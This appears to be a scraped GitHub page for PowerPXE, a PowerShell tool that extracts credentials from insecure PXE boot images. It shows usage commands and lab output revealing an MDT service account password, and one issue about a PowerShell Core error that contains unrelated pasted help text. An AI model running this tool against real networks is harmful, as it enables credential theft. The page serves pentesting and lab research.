powerpxe's Introduction

PowerPXE

PowerPXE is a PowerShell script that extracts interesting data from insecure PXE boot.

The associated article was published in MISC n° 103 (in french).

Quick Usage

Open an elevated PowerShell prompt :

Import-Module PowerPxe
Get-PXEcreds -InterfaceAlias Ethernet

The ouput should be :

    >> Get a valid IP adress
    >>> >>> DHCP proposal IP address: 192.168.22.101
    >>> >>> DHCP Validation: DHCPACK
    >>> >>> IP address configured: 192.168.22.101
    >> Request BCD File path
    >>> >>> BCD File path:  \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd
    >>> >>> TFTP IP Address:  192.168.22.3
    >> Launch TFTP download
    >>>> Transfer succeeded.
    >> Parse the BCD file: conf.bcd
    >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim
    >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
    >> Launch TFTP download
    >>>> Transfer succeeded.
    >> Open LiteTouchPE_x86.wim
    >>>> Finding Bootstrap.ini
    >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$
    >>>> >>>> UserID = MdtService
    >>>> >>>> UserDomain = lab.fr
    >>>> >>>> UserPassword = Somepass1
    >> Launch TFTP download
    >>>> Transfer succeeded.
    >> Open LiteTouchPE_x64.wim
    >>>> Finding Bootstrap.ini
    >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$
    >>>> >>>> UserID = MdtService
    >>>> >>>> UserDomain = lab.fr
    >>>> >>>> UserPassword = Somepass1

Lab deployement

In order to test this module, the framework AutomatedLab was used to automatically deploy a lab with Microsoft Deployment Toolkit (MDT) installed. The deployement script is present inside the "Labs" directory.

Credits

I'd like to thank the following people for their work :

Thomas Elling : Attacks Against Windows PXE Boot Images
Chris Dent : DHCP Discovery
Valks: TFTP.NET implementation
Matthew Graeber : BCD powershell module

powerpxe's People

Contributors

Stargazers

Watchers

powerpxe's Issues

Cim not available on PS Core

On Windows, Powershell 5.1.17763.1007

PS > Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd 
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim 
\Boot\x64\Images\LiteTouchPE_x64.wim

On Linux, PowerShell Core 7.3.6

PS > Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd                
InvalidArgument: /home/noraj/test/powerpxe/PowerPXE.ps1:1672
Line |                                                                                                    
1672 |              $CimSession = ''                                                                      
     |              ~~~~~~~~~~~~~~~~                                                                      
     | Cannot convert value "" to type "Microsoft.Management.Infrastructure.CimSession[]". Error: "The method or operation is not implemented."
Usage: unique [option[s]] OUTPUT-FILE                                                                     

Options:
-v                 verbose mode, output stats before each slow pass (if any)
-inp=FILE          read from FILE instead of stdin
-cut=N             truncate input lines to N bytes
-cut=LM            for LM: Split lines longer than 7 in two, and uppercase
-hash-size=N       override the hash size (given in log2). The default is
                   25 for 2304 MB, memory use doubles for each increment
-buf=N             Total allowed buffer size, in GB. If -hash-size isn't
                   given as well, a sensible one will be used
-ex_file=FILE      the data from FILE is also used to unique the output, but
                   nothing is ever written to FILE
-ex_file_only=FILE assumes the input is already unique, and only checks
                   against FILE (again the latter is not written to)

NOTE that if you try to use more memory than actually available physical
memory, performance will just drop.

CIMCmdlets seems to be available only on Windows.

Installing the Cim module from PSGallery doesn't change a thing because it has only some Get-SimReg* commands and CimSession just implement New-CimSessionDown for New-CimSession.

PS > Find-Module Cim                                                                                                                                                   
                                                                                                                                                                                                                     
Version              Name                                Repository           Description                                                                                                                            
-------              ----                                ----------           -----------                                                                                                                            
1.6.3                Cim                                 PSGallery            CIM with support for lower operating systems and registry reads
PS > Install-Module -Name Cim

Is there a way to parse for Wim file without Cim?

Recommend Projects